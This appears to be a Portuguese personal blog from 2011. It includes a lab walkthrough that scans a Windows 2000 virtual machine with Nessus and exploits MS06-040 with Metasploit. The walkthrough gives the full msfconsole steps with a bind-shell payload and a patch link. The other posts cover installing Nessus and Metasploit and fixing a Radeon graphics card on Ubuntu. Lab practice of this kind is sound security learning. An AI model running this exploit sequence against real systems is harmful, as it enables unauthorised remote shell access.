segunda-feira, 26 de setembro de 2011

Identificação e Exploração de vulnerabilidade - chutando cachorro morto

Cobaia: windows 2000 rodando no virtualbox

1) ligar windows 2000 e configurar rede (no meu caso 50.0.0.10)
2) com Nessus, fazer varredura na maquina win2000
3) identificar a vulnerabilidade ms06-040
4) Com nmap, identificar a porta 445 aberta (etapa não obrigatória)
nmap 50.0.0.10 -p 445
5) Metasploit
    $ msfconsole
    show exploits (identificar o ms06-040)
    use windows/smb/ms06_040_netapi
    set RHOST 50.0.0.10 (IP do alvo)
    set LHOST 50.0.0.2 (IP origem)
    show payloads (o que se deseja apos explorar vulnerabilidade)
    set PAYLOAD windows/shell/bind_tcp
exploit

Para consertar a vulnerabilidade, baixar o patch http://technet.microsoft.com/en-us/security/bulletin/ms06-040

Instalação do Nessus

Vamos direto ao ponto para não complicar.

a) Acessar para fazer download em http://www.tenable.com/products/nessus/nessus-download-agreement
No meu caso foi .deb para 64bits: http://downloads.nessus.org/nessus3dl.php?file=Nessus-4.4.1-debian5_amd64.deb&licence_accept=yes&t=26b8a3dbd1ccd6c38aeb0b2fe925ad0a



b) instalar normalmente
# dpkg -i Nessus*.deb

c) Após a instalação ele dá os passos, que são:

# /opt/nessus/sbin/nessus-adduser (criar usuario)

d) registrar no site: http://www.nessus.org/register/:
A chave de registro bem como as instruções são enviadas para o e-mail.
Normalmente faz-se assim:
# /opt/nessus/bin/nessus-fetch --register (chave que recebeu no email)

e) rodar o servidor nessus:
# /opt/nessus/sbin/nessusd


f) acessar a interface gráfica e utilizar:
https://localhost:8834

obs.: pode-se criar outros usuários não-administradores via linha de comando ou na interface web.

Instalação do Metasploit

Testado em Debian e Ubuntu, mas creio que funciona para qualquer outra distribuição uma vez que foi utilizado pacote universal.

1) baixar o pacote instalador em http://www.metasploit.com/download/:
No meu caso baixei o 64bits full setup (http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run)

2) Alterar para root com "su -" e instalar o pacote dentro o /opt:
$ su - (atenção, não funcionou com "su", pois não carrega todas as variáveis de ambiente)
# chmod 700 framework*.run
# ./framework*.run  (deve perguntar se deseja atualizar base, então diga sim)

3) Atualizar a base de dados caso não o tenha feito:
# msfupdate

4) Utilizar o metasploit como usuário comum:
$ msfconsole

Quanto ao uso do metasploit, futuramente coloco algumas instruções.

segunda-feira, 12 de setembro de 2011

Ubuntu 11.04 x Dell Vostro 3450 c/ placa gráfica ATI Radeon 6600

Infelizmente não consegui funcionar a placa gráfica AMD Radeon HD6600M Series no Ubuntu 11.04. Este problema não é particularidade do Ubuntu, mas pelo que li em alguns foruns, devido a placa possuir somente ainda drivers proprietários, não tem como desenvolvedores Linux aprimorarem o driver de forma que ele funcione como deveria.

Minhas placas gráficas são:
#lspci | grep VGA
Intel Corporation 2nd Generation Core Processos Family Integrated Graphics Controller (rev 09)
ATI Technologies Inc NI Whistler [AMD Radeon HD 6600M Series] (rev ff)

Enquanto aguardo este parangolê funcionar direito, a solução que utilizo (baseando-me no artigo VGAswitcheroo – Tópico Definitivo), foi fazer com que o módulo da placa gráfica radeon carregue DEPOIS da placa onboard e isto pode ser feito da seguinte forma:

1°) colocar o módulo radeon na blacklist, o que o impedirá de ser carregado primeiro:
echo "blacklist radeon" >> /etc/modprobe.d/blacklist.conf

2°) Carregar o módulo radeon no script rc.local e desligar a placa radeon para economizar energia do notebook. Para isto, edite o arquivo /etc/rc.local e insira as seguintes linhas antes do "exit 0":

modprobe radeon
echo OFF > /sys/kernel/debug/vgaswitcheroo/switch

A respeito da 2ª linha acima, um resumo de opções possíveis(informações obtidas do link mencionado anteriormente):
ON – liga a placa gráfica secundária (e que não está sendo utilizada no momento)
OFF – desliga a placa gráfica secundária (e que não está sendo utilizada no momento)
DDIS – alterna a placa gráfica discreta(popular offboard), como a placa primária da sessão.
DIGD - alterna a placa gráfica integrada, como a placa primária da sessão.